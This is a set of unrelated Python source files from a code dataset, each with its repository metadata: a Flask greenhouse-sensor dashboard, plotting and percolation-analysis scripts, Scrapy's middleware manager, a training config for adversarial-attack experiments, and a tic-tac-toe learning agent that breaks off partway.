IlluminationDay.append({'name': moment, 'value': [str(hour), old[0][10]]})
CarbonDioxideDay.append({'name': moment, 'value': [str(hour), old[0][8]]})
oxy = old[0][11]
# print(oxy.find('%'))
if int(oxy.find('%')) >= 0:
OxygenDay.append({'name': moment, 'value': [str(hour), oxy[:-1]]})
else:
OxygenDay.append({'name': moment, 'value': [str(hour), oxy]})
DustDay.append({'name': moment, 'value': [str(hour), old[0][9]]})
SoilTempDay.append({'name': moment, 'value': [str(hour), old[0][12]]})
SoilHumDay.append({'name': moment, 'value': [str(hour), old[0][13]]})
except Exception:
pass #应该传给前端数据缺少标志 前端显示缺少数据
# 取得今天零点数据
# today = datetime.date.today()
QueryTime = [today, '00']
old = db.readMinMinute(QueryTime)
if not old:
QueryTime = [str(today), '0']
old = db.readMinMinute(QueryTime)
try:
date = str(today)
date = date[:4] + '/' + date[5:7] + '/' + date[8:]
moment = date + ' ' + old[0][2] + ':' + old[0][3] + ':' + old[0][4]
DateDay.append('24')
TemperatureDay.append({'name': moment, 'value': ['24', old[0][5]]})
HumidityDay.append({'name': moment, 'value': ['24', old[0][6]]})
IlluminationDay.append({'name': moment, 'value': ['24', old[0][10]]})
CarbonDioxideDay.append({'name': moment, 'value': ['24', old[0][8]]})
oxy = old[0][11]
if int(oxy.find('%')) >= 0:
OxygenDay.append({'name': moment, 'value': ['24', oxy[:-1]]})
else:
OxygenDay.append({'name': moment, 'value': ['24', oxy]})
DustDay.append({'name': moment, 'value': ['24', old[0][9]]})
SoilTempDay.append({'name': moment, 'value': ['24', old[0][12]]})
SoilHumDay.append({'name': moment, 'value': ['24', old[0][13]]})
except Exception:
pass
t = {
# 'Data': [data[0][5], data[0][6], data[0][10], data[0][8], data[0][11], data[0][9]],
# 'anchorDay': anchorDay,
'Today' : today,
'DateDay': DateDay,
'TemperatureDay': TemperatureDay,
'HumidityDay': HumidityDay,
'IlluminationDay': IlluminationDay,
'CarbonDioxideDay': CarbonDioxideDay,
'OxygenDay': OxygenDay,
'DustDay': DustDay,
'SoilTempDay': SoilTempDay,
'SoilHumDay': SoilHumDay
}
init = json.dumps(t)
return init
@app.route("/initweek", methods=['GET','POST'])
def initweek():
anchorWeek = []
DateWeek = []
TemperatureWeek = []
HumidityWeek = []
IlluminationWeek = []
CarbonDioxideWeek = []
OxygenWeek = []
DustWeek = []
SoilTempWeek = []
SoilHumWeek = []
week = beforeDays(7)
# today = str(datetime.date.today())
# anchorWeek.append({'value': [str(week[0])[5:] + " 00:00:00", 0]})
# anchorWeek.append({'value': [today[5:] + " 00:00:00", 0]})
for day in week:
for hour in range(4, 21, 8):
QueryTime = []
if hour < 10:
QueryTime = [str(day), '0' + str(hour)]
else:
QueryTime = [str(day), str(hour)]
old = db.readMinMinute(QueryTime)
if not old:
QueryTime = [str(day), str(hour)]
old = db.readMinMinute(QueryTime)
threeTimeOfDay = ""
if hour == 4:
pass
elif hour == 12:
threeTimeOfDay = " noon"
else:
threeTimeOfDay = " even"
try:
date = str(day)
date = date[:4] + '/' + date[5:7] + '/' + date[8:]
DateWeek.append(date[5:] + threeTimeOfDay)
moment = date + ' ' + old[0][2] + ':' + old[0][3] + ':' + old[0][4]
xAxisTime = removeZero(date[5:])
TemperatureWeek.append({'name': moment, 'value': [xAxisTime + threeTimeOfDay, old[0][5]]})
HumidityWeek.append({'name': moment, 'value': [xAxisTime + threeTimeOfDay, old[0][6]]})
IlluminationWeek.append({'name': moment, 'value': [xAxisTime + threeTimeOfDay, old[0][10]]})
CarbonDioxideWeek.append({'name': moment, 'value': [xAxisTime + threeTimeOfDay, old[0][8]]})
oxy = old[0][11]
if int(oxy.find('%')) >= 0:
OxygenWeek.append({'name': moment, 'value': [xAxisTime + threeTimeOfDay, oxy[:-1]]})
else:
OxygenWeek.append({'name': moment, 'value': [xAxisTime + threeTimeOfDay, oxy]})
DustWeek.append({'name': moment, 'value': [xAxisTime + threeTimeOfDay, old[0][9]]})
SoilTempWeek.append({'name': moment, 'value': [xAxisTime + threeTimeOfDay, old[0][12]]})
SoilHumWeek.append({'name': moment, 'value': [xAxisTime + threeTimeOfDay, old[0][13]]})
except Exception:
date = str(day)
date = date[:4] + '/' + date[5:7] + '/' + date[8:]
DateWeek.append(date[5:]+threeTimeOfDay)
moment = date + ' ' + str(hour) + ':00:00'
xAxisTime = removeZero(date[5:])
TemperatureWeek.append({'name': moment, 'value': [xAxisTime+threeTimeOfDay, '0']})
HumidityWeek.append({'name': moment, 'value': [xAxisTime+threeTimeOfDay, '0']})
IlluminationWeek.append({'name': moment, 'value': [xAxisTime+threeTimeOfDay, '0']})
CarbonDioxideWeek.append({'name': moment, 'value': [xAxisTime+threeTimeOfDay, '0']})
OxygenWeek.append({'name': moment, 'value': [xAxisTime+threeTimeOfDay, '0']})
DustWeek.append({'name': moment, 'value': [xAxisTime+threeTimeOfDay, '0']})
SoilTempWeek.append({'name': moment, 'value': [xAxisTime+threeTimeOfDay, '0']})
SoilHumWeek.append({'name': moment, 'value': [xAxisTime+threeTimeOfDay, '0']})
t = {
# 'anchorWeek': anchorWeek,
'DateWeek': DateWeek,
'TemperatureWeek': TemperatureWeek,
'HumidityWeek': HumidityWeek,
'IlluminationWeek': IlluminationWeek,
'CarbonDioxideWeek': CarbonDioxideWeek,
'OxygenWeek': OxygenWeek,
'DustWeek': DustWeek,
'SoilTempWeek': SoilTempWeek,
'SoilHumWeek': SoilHumWeek
}
init = json.dumps(t)
return init
@app.route("/initmonth", methods=['GET','POST'])
def initmonth():
anchorMonth = []
DateMonth = []
TemperatureMonth = []
HumidityMonth = []
IlluminationMonth = []
CarbonDioxideMonth = []
OxygenMonth = []
DustMonth = []
SoilTempMonth = []
SoilHumMonth = []
month = beforeDays(31)
# today = str(datetime.date.today())
# anchorMonth.append({'value': [str(month[0])[5:] + " 00:00:00", 0]})
# anchorMonth.append( {'value': [today[5:] + " 00:00:00", 0]})
for day in month:
old = db.readByDate(str(day))
try:
date = str(day)
date = date[:4] + '/' + date[5:7] + '/' + date[8:]
DateMonth.append(date[5:])
moment = date + ' ' + old[0][2] + ':' + old[0][3] + ':' + old[0][4]
queryData = removeZero(date[5:])
TemperatureMonth.append({'name': moment, 'value': [queryData, old[0][5]]})
HumidityMonth.append({'name': moment, 'value': [queryData, old[0][6]]})
IlluminationMonth.append({'name': moment, 'value': [queryData, old[0][10]]})
CarbonDioxideMonth.append({'name': moment, 'value': [queryData, old[0][8]]})
oxy = old[0][11]
if int(oxy.find('%')) >= 0:
OxygenMonth.append({'name': moment, 'value': [queryData, oxy[:-1]]})
else:
OxygenMonth.append({'name': moment, 'value': [queryData, oxy]})
DustMonth.append({'name': moment, 'value': [queryData, old[0][9]]})
SoilTempMonth.append({'name': moment, 'value': [queryData, old[0][12]]})
SoilHumMonth.append({'name': moment, 'value': [queryData, old[0][13]]})
except Exception:
date = str(day)
date = date[:4] + '/' + date[5:7] + '/' + date[8:]
DateMonth.append(date[5:])
moment = date + " 00:00:00"
queryData = removeZero(date[5:])
TemperatureMonth.append({'name': moment, 'value': [queryData, '0']})
HumidityMonth.append({'name': moment, 'value': [queryData, '0']})
IlluminationMonth.append({'name': moment, 'value': [queryData, '0']})
CarbonDioxideMonth.append({'name': moment, 'value': [queryData, '0']})
OxygenMonth.append({'name': moment, 'value': [queryData, '0']})
DustMonth.append({'name': moment, 'value': [queryData, '0']})
SoilTempMonth.append({'name': moment, 'value': [queryData, '0']})
SoilHumMonth.append({'name': moment, 'value': [queryData, '0']})
t = {
# 'anchorMonth': anchorMonth,
'DateMonth': DateMonth,
'TemperatureMonth': TemperatureMonth,
'HumidityMonth': HumidityMonth,
'IlluminationMonth': IlluminationMonth,
'CarbonDioxideMonth': CarbonDioxideMonth,
'OxygenMonth': OxygenMonth,
'DustMonth': DustMonth,
'SoilTempMonth': SoilTempMonth,
'SoilHumMonth': SoilHumMonth
}
init = json.dumps(t)
return init
def beforeDays(n):
utc_dt = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc)
bj_dt = utc_dt.astimezone(datetime.timezone(datetime.timedelta(hours=8)))
before_n_days = []
for i in range(1, n+1)[::-1]:
before_n_days.append(str(bj_dt.date() - datetime.timedelta(days=i)))
return before_n_days
def removeZero(string):
xAxisTime = string
if xAxisTime[0] == '0':
xAxisTime = xAxisTime[1:]
loc = xAxisTime.find('/')
if xAxisTime[loc+1] == '0':
xAxisTime = xAxisTime[:loc+1] + xAxisTime[loc+2:]
return xAxisTime
if __name__=="__main__":
# ta = threading.Thread(target=app.run(debug=True, port=5000))#, ssl_context='adhoc'))
# tb = threading.Thread(target=loriot.getLoriotData)
app.run(debug=True, port=5000)
# ta.start()
# tb.start()
| [
"yu.bill@hotmail.com"
] | yu.bill@hotmail.com |
efb758695b1633497870906b498201d9ad1152c0 | a42682a84c6cc943f68139f7daeba0d4991d5ec8 | /game/THREE/renderers/shaders/schunk/aomap_pars_fragment.py | 421270daf1eb4ed1fbf89caa258f7e402a3b24ca | [] | no_license | alijaya/Test-OpenGL-Renpy | cf213e8bd6a63a49811f44fd7581666b284ac561 | 502be62712d2d90eca28fc36d0679e94896a88ba | refs/heads/master | 2021-06-21T12:49:34.709115 | 2017-08-15T01:23:02 | 2017-08-15T01:23:02 | 100,321,839 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 91 | py | """
#ifdef USE_AOMAP
uniform sampler2D aoMap;
uniform float aoMapIntensity;
#endif
"""
| [
"alijayameilio@gmail.com"
] | alijayameilio@gmail.com |
b9102cfe6e9b3b6d3b6fdd86abffeabd7cb7b1fe | ad27b8cd9b60831fe39ef78a614f220821a589fb | /violin_plotter.py | bc69f67a0a257707f19af0dc64fa51d717845751 | [] | no_license | mhk29/QCLabDB | 2ed7ea80ed5a2360d04eb7aa976fb0a466c41b44 | d64fe30a97014016430a8c350bf1797251839193 | refs/heads/master | 2022-12-27T08:11:33.050713 | 2020-10-07T14:18:33 | 2020-10-07T14:18:33 | 294,422,555 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 805 | py | import numpy as np
import matplotlib.pyplot as plt
import sys, argparse, csv
import collections
# from settings import *
np.random.seed(19680206)
fs = 10 # fontsize
# data_path = 'testcsv.csv'
data_path = argv[1]
with open(data_path, 'r') as f:
reader = csv.reader(f, delimiter=',')
headers = next(reader)
data = np.array(list(reader)).astype(float)
a = int(argv[2]);
b = int(argv[3]);
fig, axes = plt.subplots(nrows=1, ncols=1, figsize=(6, 6))
axes.violinplot(data, points=20, widths=0.3,
showmeans=True, showextrema=True, showmedians=True)
axes.set_title('violinplot', fontsize=fs)
axes.set_xticks([1,2])
axes.set_xticklabels([a,b])
# r = np.corrcoef(data[:,a],data[:,b])
# print(r)
fig.suptitle("Violin Plotting")
fig.subplots_adjust(hspace=0.4)
plt.show()
| [
"noreply@github.com"
] | mhk29.noreply@github.com |
fb6a09341d539337059741848aeb866dc91ef36d | f2ceab80e38a6113b59858e7f574cd9b74d1bdd7 | /gmatching.py | b6a1d7456e5d6c63da2005ab3e53a3ed17f11893 | [] | no_license | ldlongo/Percolacion | eaf50cd1fe1ff13a33554c4b0a843ff0b147bb1b | 929d858844de4eefe65f78e62f937a76d2dbb6c4 | refs/heads/master | 2021-01-19T21:32:05.784666 | 2017-05-02T16:56:25 | 2017-05-02T16:56:25 | 88,660,594 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,192 | py | import matplotlib.pyplot as plt
import numpy as np
from scipy.optimize import curve_fit
#funcion para el ajuste
def func(x, a, b):
return (a*x)+b
data={} #diccionario de datos
#probas
archivo=['6.txt','128.txt']
key=['6','128']
for i in range(0,len(key)):
f=open(archivo[i],'r')
lines=f.readlines()[2:]
x=[]
y=[]
for line in lines:
p = line.split()
x.append(float(p[0]))
y.append(float(p[1]))
xv=np.array(x)
yv=np.array(y)
data[key[i]]=[xv,yv]
f.close()
'''
#--------------------------------------------------------------------------
#gamma matching
#Metodo 1: interseccion de pendientes
#Se grafican gammas vs p alrededor de pc para pc- y pc+ y se busca donde
#se intersectan ambas curvas
#--------------------------------------------------------------------------
pc=[0.587771, 0.5925]
gamasup={}
gamainf={}
for k in range(0,len(key)):
aux1=[]
aux2=[]
for i in range(0,len(data[key[k]][0])-1):
if data[key[k]][0][i]>pc[k]:
#defino
pinf=data[key[k]][0][i]
psup=data[key[k]][0][i+1]
m2inf=data[key[k]][1][i]
m2sup=data[key[k]][1][i+1]
#ademas sabemos que la derivada tiene que ser positiva me quedo con las que son posit
if (float(m2sup-m2inf)/float(psup-pinf))<0:
aux1.append(data[key[k]][0][i]-pc[k])
aux2.append(float(m2sup-m2inf)/float(psup-pinf))
gamasup[key[k]]=(aux1,aux2)
for k in range(0,len(key)):
aux1=[]
aux2=[]
for i in range(0,len(data[key[k]][0])-1):
if data[key[k]][0][i]<pc[k]:
#defino
pinf=data[key[k]][0][i]
psup=data[key[k]][0][i+1]
m2inf=data[key[k]][1][i]
m2sup=data[key[k]][1][i+1]
#ademas sabemos que la derivada tiene que ser positiva me quedo con las que son posit
if (float(m2sup-m2inf)/float(psup-pinf))>0:
aux1.append(-(data[key[k]][0][i]-pc[k]))
aux2.append(float(m2sup-m2inf)/float(psup-pinf))
gamainf[key[k]]=(aux1,aux2)
#---------------------------------------------------------------
#grafico:
#key[0] para 6 y key[1] para 128
L=0#0 o 1 si quiero L=6 o L=128
plt.figure(0)
#grafico en dos colores:
for i in range(0,len(data[key[L]][0])):
if data[key[L]][0][i]<pc[1]:
plt.plot(data[key[L]][0][i],data[key[L]][1][i],'ro')
else:
plt.plot(data[key[L]][0][i],data[key[L]][1][i],'bo')
plt.xlabel(r'$p$',size=15)
plt.ylabel(r'$M_{2}(p)$',size=15)
plt.figure(1)
plt.plot(gamainf[key[L]][0],gamainf[key[L]][1],'ro',label=r'$\gamma-$')
plt.plot(gamasup[key[L]][0],gamasup[key[L]][1],'bo',label=r'$\gamma+$')
plt.legend()
plt.xlabel(r'$|p-p_{c}|$')
plt.ylabel(r'$\gamma$'" gamma")
plt.show()
'''
#--------------------------------------------------------------------------
#gamma matching
#Metodo de pendientes paralelas
#Se grafican log(M2) VS log(p-pc) para p>pc y p<pc. Luego se buscan
#ajustes cuyas pendientes a lo largo de esas curvas que sean paralelas.
#--------------------------------------------------------------------------
#L 6: con n=4(cantidad de puntos del fit) y margen=0.001
#encontro un gamma =-2.13
#L 128: con n=4 (cantidad de puntos del fit) y margen=0.001
#encontro un gamma =-2.64
pc=[0.587771, 0.5925]
logfitxmas=[]
logfitymas=[]
L=1#0 o 1 si quiero L=6 o L=128
# y me contruyo dos graficos uno en pc+ y otro pc- ambos en log log
for i in range(0,len(data[key[L]][0])):
if data[key[L]][0][i]>pc[L]:
logfitxmas.append(np.log(data[key[L]][0][i]-pc[L]))
logfitymas.append(np.log(data[key[L]][1][i]))
logfitxmen=[]
logfitymen=[]
for i in range(0,len(data[key[L]][0])):
if data[key[L]][0][i]<pc[L]:
logfitxmen.append(np.log(pc[L]-data[key[L]][0][i]))
logfitymen.append(np.log(data[key[L]][1][i]))
#me muevo sobre las curvas (xmen,ymen) y (xmas,ymas), y elijo realizar ajustes tomando n puntos
n=4#numero de puntos que tomo para fit
gammamenos=[]#tiene las pendientes a lo largo de la curva gamma menos
ordenadamenos=[]
for i in range(0,len(logfitxmen)-n):
xdata=[]
ydata=[]
for j in range(0,n-1):
xdata.append(logfitxmen[i+j])
ydata.append(logfitymen[i+j])
parmfit=(curve_fit(func,xdata,ydata))
gammamenos.append(parmfit[0][0])
ordenadamenos.append(parmfit[0][1])
#me muevo sobre las curvas (xmen,ymen) y (xmas,ymas), y elijo realizar ajustes tomando n puntos
n=4#numero de puntos que tomo para fit
gammamas=[]#tiene las pendientes a lo largo de la curva gamma menos
ordenadamas=[]
for i in range(0,len(logfitxmas)-n):
xdata=[]
ydata=[]
parmfit=[]
for j in range(0,n-1):
xdata.append(logfitxmas[i+j])
ydata.append(logfitymas[i+j])
parmfit=(curve_fit(func,xdata,ydata))
#print parmfit[0][0]
gammamas.append(parmfit[0][0])
ordenadamas.append(parmfit[0][1])
#busco ahora gammas coincidentes en mas menos 0.01
#comparo todos con todos:
margen=0.001
matchmenos=[]#aca guardo las dos pendientes que coinciden y sus ordenadas
matchmas=[]
for i in range(0,len(gammamas)):
for j in range(0,len(gammamenos)):
# me fijo cual es menor
if (abs(gammamas[i]-gammamenos[j])<margen):
print "Encontro el siguiente match"
print (gammamas[i],gammamenos[j])
matchmenos=[gammamenos[j],ordenadamenos[j]]
matchmas=[gammamas[i],ordenadamas[i]]
#Grafico 1#gammamas
plt.figure(0)
for i in range(0,len(gammamas)):#numero de fits que tengo
xfit=np.zeros(len(logfitxmas))
yfit=np.zeros(len(logfitxmas))
for j in range(0,len(logfitxmas)):
parmfit=[gammamas[i],ordenadamas[i]]
xfit[j]=logfitxmas[j]
yfit[j]=(func(logfitxmas[j],*parmfit))
plt.plot(xfit,yfit,'b-')
plt.plot(logfitxmas,logfitymas,'bo',label=r'$\gamma+$')
plt.xlabel(r'$log |p-p_{c}|$')
plt.ylabel("log M2")
plt.legend()
#Grafico 2#gammamenos
plt.figure(1)
for i in range(0,len(gammamenos)):#numero de fits que tengo
xfit=np.zeros(len(logfitxmen))
yfit=np.zeros(len(logfitxmen))
for j in range(0,len(logfitxmen)):
parmfit=[gammamenos[i],ordenadamenos[i]]
xfit[j]=logfitxmen[j]
yfit[j]=(func(logfitxmen[j],*parmfit))
plt.plot(xfit,yfit,'r-')
plt.plot(logfitxmen,logfitymen,'ro',label=r'$\gamma-$')
plt.xlabel(r'$log |p-p_{c}|$')
plt.ylabel("log M2")
plt.legend()
#Grafico 3:
plt.figure(2)
#gammamenos
xfit=np.zeros(len(logfitxmen))
yfit=np.zeros(len(logfitxmen))
parmfit=[]
for j in range(0,len(logfitxmen)):
parmfit=[matchmenos[0],matchmenos[1]]
xfit[j]=logfitxmen[j]
yfit[j]=(func(logfitxmen[j],*parmfit))
plt.plot(xfit,yfit,'r-')
plt.plot(logfitxmen,logfitymen,'ro',label=r'$\gamma-$')
plt.xlabel(r'$log |p-p_{c}|$',size=15)
plt.ylabel(r'$log M2$',size=15)
plt.legend()
#gammamas
xfit=np.zeros(len(logfitxmas))
yfit=np.zeros(len(logfitxmas))
parmfit=[]
for j in range(0,len(logfitxmas)):
parmfit=[matchmas[0],matchmas[1]]
xfit[j]=logfitxmas[j]
yfit[j]=(func(logfitxmas[j],*parmfit))
plt.plot(xfit,yfit,'b-')
plt.plot(logfitxmas,logfitymas,'bo',label=r'$\gamma+$')
plt.ylim(-5,12)
plt.xlim(-5,0)
plt.legend()
plt.xlabel(r'$log |p-p_{c}|$')
plt.ylabel(r'$log\ M_{2}$')
plt.text(-2.8,10.5, "$L=128$", fontsize=25, bbox=dict(facecolor='w', alpha=0.5))
plt.text(-2.5,4.5, "$\gamma_{-}=-2.643$", fontsize=15, bbox=dict(facecolor='r', alpha=0.5))
plt.text(-4.4,2, "$\gamma_{+}=-2.644$", fontsize=15, bbox=dict(facecolor='b', alpha=0.5))
plt.legend()
plt.show()
'''
| [
"lucaslongo52@gmail.com"
] | lucaslongo52@gmail.com |
c24849a1b8b3642186311b61a2fa807278dc9787 | 0fac5c9888fd8efc01b06357a5c069cd65750c7f | /qiushaoyi/programs/scrapy-master/scrapy/middleware.py | be36f977e41187012d0885d228dcc6ec46600443 | [
"MIT",
"BSD-3-Clause"
] | permissive | qsyPython/Python_play_now | 291f6fe19f847b852f322da280d6d0c4e71f67d4 | 278b6d5d30082f8f93b26902c854737c4919405a | refs/heads/master | 2022-04-29T09:58:45.530870 | 2019-06-17T11:31:39 | 2019-06-17T11:31:39 | 125,870,084 | 2 | 1 | MIT | 2022-03-22T20:26:09 | 2018-03-19T14:23:31 | HTML | UTF-8 | Python | false | false | 2,920 | py | from collections import defaultdict
import logging
import pprint
from scrapy.exceptions import NotConfigured
from scrapy.utils.misc import load_object
from scrapy.utils.defer import process_parallel, process_chain, process_chain_both
logger = logging.getLogger(__name__)
class MiddlewareManager(object):
"""Base class for implementing middleware managers"""
component_name = 'foo middleware'
def __init__(self, *middlewares):
self.middlewares = middlewares
self.methods = defaultdict(list)
for mw in middlewares:
self._add_middleware(mw)
@classmethod
def _get_mwlist_from_settings(cls, settings):
raise NotImplementedError
@classmethod
def from_settings(cls, settings, crawler=None):
mwlist = cls._get_mwlist_from_settings(settings)
middlewares = []
enabled = []
for clspath in mwlist:
try:
mwcls = load_object(clspath)
if crawler and hasattr(mwcls, 'from_crawler'):
mw = mwcls.from_crawler(crawler)
elif hasattr(mwcls, 'from_settings'):
mw = mwcls.from_settings(settings)
else:
mw = mwcls()
middlewares.append(mw)
enabled.append(clspath)
except NotConfigured as e:
if e.args:
clsname = clspath.split('.')[-1]
logger.warning("Disabled %(clsname)s: %(eargs)s",
{'clsname': clsname, 'eargs': e.args[0]},
extra={'crawler': crawler})
logger.info("Enabled %(componentname)ss:\n%(enabledlist)s",
{'componentname': cls.component_name,
'enabledlist': pprint.pformat(enabled)},
extra={'crawler': crawler})
return cls(*middlewares)
@classmethod
def from_crawler(cls, crawler):
return cls.from_settings(crawler.settings, crawler)
def _add_middleware(self, mw):
if hasattr(mw, 'open_spider'):
self.methods['open_spider'].append(mw.open_spider)
if hasattr(mw, 'close_spider'):
self.methods['close_spider'].insert(0, mw.close_spider)
def _process_parallel(self, methodname, obj, *args):
return process_parallel(self.methods[methodname], obj, *args)
def _process_chain(self, methodname, obj, *args):
return process_chain(self.methods[methodname], obj, *args)
def _process_chain_both(self, cb_methodname, eb_methodname, obj, *args):
return process_chain_both(self.methods[cb_methodname], \
self.methods[eb_methodname], obj, *args)
def open_spider(self, spider):
return self._process_parallel('open_spider', spider)
def close_spider(self, spider):
return self._process_parallel('close_spider', spider)
| [
"qsy118614@163.com"
] | qsy118614@163.com |
f3729c568c035df49c22db835fab9c9363146475 | 9c3e0c3ea5fe2d8f48eeefdc3a9ec06a0672065d | /hackerrank/python_challenge/string_validator.py | c7a65df0ca211dee8b7cef73d3d646e743bd63a6 | [] | no_license | vaishwadeanurag/hackspace | 3e3e934367c57c566636d18a1f07a84f2d6a289c | 24c28ca2b17524c0aa2f4f67577bbc9b5c989c8d | refs/heads/master | 2021-08-31T17:38:26.541016 | 2017-12-22T08:19:52 | 2017-12-22T08:19:52 | 111,996,001 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 619 | py | # https://www.hackerrank.com/challenges/string-validators/problem
import string
if __name__ == '__main__':
s = input()
alpha = False
num = False
lower = False
upper = False
for i in s:
if not lower and i in string.ascii_lowercase:
lower = True
alpha = True
if not upper and i in string.ascii_uppercase:
upper = True
alpha = True
if not num and i.isdigit():
num = True
if lower and upper and num:
break
print(alpha or num)
print(alpha)
print(num)
print(lower)
print(upper) | [
"anuragvaishwade@gmail.com"
] | anuragvaishwade@gmail.com |
e38453257b5ffe4bf78b33679e66f545f003e960 | 5cb8c3d774391f0a04a4ca84cb3f038c5046057b | /config.py | 410e46c3b466b4cf80f06bfbab7e88f684b0e59f | [
"MIT"
] | permissive | zhhiyuan/wide_attack | e0eb90d48cf157621ad698336fd787fe198843e4 | 448df3dd3aad2ca9a514960e8403bf7e8d8eed3a | refs/heads/master | 2022-07-22T14:39:29.814189 | 2020-05-20T04:19:40 | 2020-05-20T04:19:40 | 263,548,854 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,273 | py | import torch as t
class Config:
model_path = None# 预训练模型,None表示重新训练
model = 'SqueezeNet1_1'#加载的模型,模型名必须与models/__init__.py中的名字一致
epsilon = 0.3 #PGD攻击中的干扰参数
'''
ShuffleNetV2, ShuffleNetV2_x2,
ShuffleNetV2_x4, MobileNetV2,
MobileNetV2_x2,MobileNetV2_x4,
'''
lr = 0.0005 #学习率
use_gpu = True #是否使用gpu
MEAN= (0.4914, 0.4822, 0.4465)
STD=(0.2023, 0.1994, 0.2010)#均值和方差
train_epoch = 1 # 将数据集训练多少次
save_every = 1 # 每训练多少轮保存一次模型
# imagenet得出的较好的值,具体过程参考
# https://cloud.tencent.com/developer/ask/153881
test_num = 16 # 选择攻击和测试的样本数量
batch_size = 128 # 每次喂入多少数据
print_freq = 500 # 每训练多少批次就打印一次
num_workers = 8 #加载数据集的线程数
def _parese(self):
self.device = t.device('cuda') if self.use_gpu else t.device('cpu')
print('Caculate on {}'.format(self.device))
print('user config:')
for k, v in self.__class__.__dict__.items():
if not k.startswith('_'):
print(k, getattr(self, k))
| [
"31727698+zhhiyuan@users.noreply.github.com"
] | 31727698+zhhiyuan@users.noreply.github.com |
3f1602c001f4b70e038794a08ba4c725871c4198 | 040bd1995190e858299fcdd716bd986aa0664d13 | /Trees and Graphs/MaxiumumDepthOfBinaryTree.py | 04b51d71defc1958be86b73fc93dbac3a0196e5e | [] | no_license | PravinSelva5/LeetCode_Grind | 7c568d68231ff34332d756237e79ca8d19cebfec | aa5fb8eb12b1e1903cb0cb688dc41f959e4caf6a | refs/heads/master | 2023-02-08T13:05:10.355867 | 2021-01-05T02:55:29 | 2021-01-05T02:55:29 | 271,690,775 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,066 | py | '''
Given the root of a binary tree, return its maximum depth.
A binary tree's maximum depth is the number of nodes along the longest path from the root node down to the farthest leaf node
--------------------
RESULTS
--------------------
Time Complexity: O(N)
Space Complexity: O(H), H represents the height of the tree
Runtime: 32 ms, faster than 97.68% of Python3 online submissions for Maximum Depth of Binary Tree.
Memory Usage: 16.2 MB, less than 33.21% of Python3 online submissions for Maximum Depth of Binary Tree.
'''
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def maxDepth(self, root: TreeNode) -> int:
if root == None:
return 0
if root.left == None and root.right == None:
return 1
left = self.maxDepth(root.left)
right = self.maxDepth(root.right)
return max(left, right) + 1 | [
"pravin.selvarajah.eng@gmail.com"
] | pravin.selvarajah.eng@gmail.com |
354fffe151be632ac75a7098700de106c6375a54 | dba200fca6011e754b7dd6cb1caa392ca3136b43 | /Player.py | 9bd879a0dd70311f27a24bee91f12efede91644a | [] | no_license | XueweiYan/Tic_Tac_Toe_Modified | 9b5cceea3a3e9dce599c9c39d37e3b84337f43b0 | d220f98c82b9800ca7fdf88a90d8203e8671b8bd | refs/heads/master | 2022-12-17T08:47:07.204357 | 2020-09-26T05:04:40 | 2020-09-26T05:04:40 | 297,521,004 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,361 | py | import os
import numpy as np
import pandas as pd
from random import random
from sympy.utilities.iterables import multiset_permutations as perm
class Player:
def __init__(self, database=None):
self._valid_lines = [[0, 1, 2], [3, 4, 5], [6, 7, 8], [0, 3, 6],
[1, 4, 7], [2, 5, 8], [0, 4, 8], [2, 4, 6]]
self._alpha = 0.5 # Learn rate
self._delta_epsilon = 0.00000001
self._min_epsilon = 0.01
self._consider_win = 0.9999 # Meaning the state almost guarantees a winning, no need to explore
if database is None:
self._epsilon = 0.5 # Explore rate
self.df_6 = self.initializedf_6()
self.df_5 = self.initializedf_5()
self.df_4 = self.initializedf_4()
self.df_3 = self.initializedf_3()
self.df_2 = self.initializedf_2()
self.df_1 = self.initializedf_1()
self.df_0 = self.initializedf_0()
else:
self._epsilon = 0.0
self.df_6 = pd.read_csv(database + "/df_6.csv").rename(columns={str(x): x for x in range(9)})
self.df_6["successor_X"] = self.df_6["successor_X"].apply(lambda x: [int(y) for y in x[1:-1].split(",")])
self.df_6["successor_O"] = self.df_6["successor_O"].apply(lambda x: [int(y) for y in x[1:-1].split(",")])
self.df_5 = pd.read_csv(database + "/df_5.csv").rename(columns={str(x): x for x in range(9)})
self.df_5["successor_O"] = self.df_5["successor_O"].apply(lambda x: [int(y) for y in x[1:-1].split(",")])
self.df_4 = pd.read_csv(database + "/df_4.csv").rename(columns={str(x): x for x in range(9)})
self.df_4["successor_X"] = self.df_4["successor_X"].apply(lambda x: [int(y) for y in x[1:-1].split(",")])
self.df_3 = pd.read_csv(database + "/df_3.csv").rename(columns={str(x): x for x in range(9)})
self.df_3["successor_O"] = self.df_3["successor_O"].apply(lambda x: [int(y) for y in x[1:-1].split(",")])
self.df_2 = pd.read_csv(database + "/df_2.csv").rename(columns={str(x): x for x in range(9)})
self.df_2["successor_X"] = self.df_2["successor_X"].apply(lambda x: [int(y) for y in x[1:-1].split(",")])
self.df_1 = pd.read_csv(database + "/df_1.csv").rename(columns={str(x): x for x in range(9)})
self.df_1["successor_O"] = self.df_1["successor_O"].apply(lambda x: [int(y) for y in x[1:-1].split(",")])
self.df_0 = pd.read_csv(database + "/df_0.csv").rename(columns={str(x): x for x in range(9)})
self.df_0["successor_X"] = self.df_0["successor_X"].apply(lambda x: [int(y) for y in x[1:-1].split(",")])
def initialize_reward(self, row):
X_win = row.index[row == 'X'].tolist() in self._valid_lines
O_win = row.index[row == 'O'].tolist() in self._valid_lines
if X_win and O_win:
return 101 # A customized error code to mark impossible situations
return 1 * X_win + (-1) * O_win # 1 for player X winning, -1 for player O, 0 for none.
def initializedf_6(self):
def find_successor_X(row):
O_same = (
df_6.loc[(df_6[row.index[row == 'O']] == 'O').all(axis=1)]
.drop(columns=["reward_X"])
)
diff_count = (O_same != (row.drop(["reward_X"]))).sum(axis=1)
return diff_count.index[diff_count == 2].tolist()
def find_successor_O(row):
X_same = (
df_6.loc[(df_6[row.index[row == 'X']] == 'X').all(axis=1)]
.drop(columns=["reward_X", "successor_X"])
)
diff_count = (X_same != row.drop(["reward_X", "successor_X"])).sum(axis=1)
return diff_count.index[diff_count == 2].tolist()
six_marks = np.array([' ', ' ', ' ', 'X', 'X', 'X', 'O', 'O', 'O'])
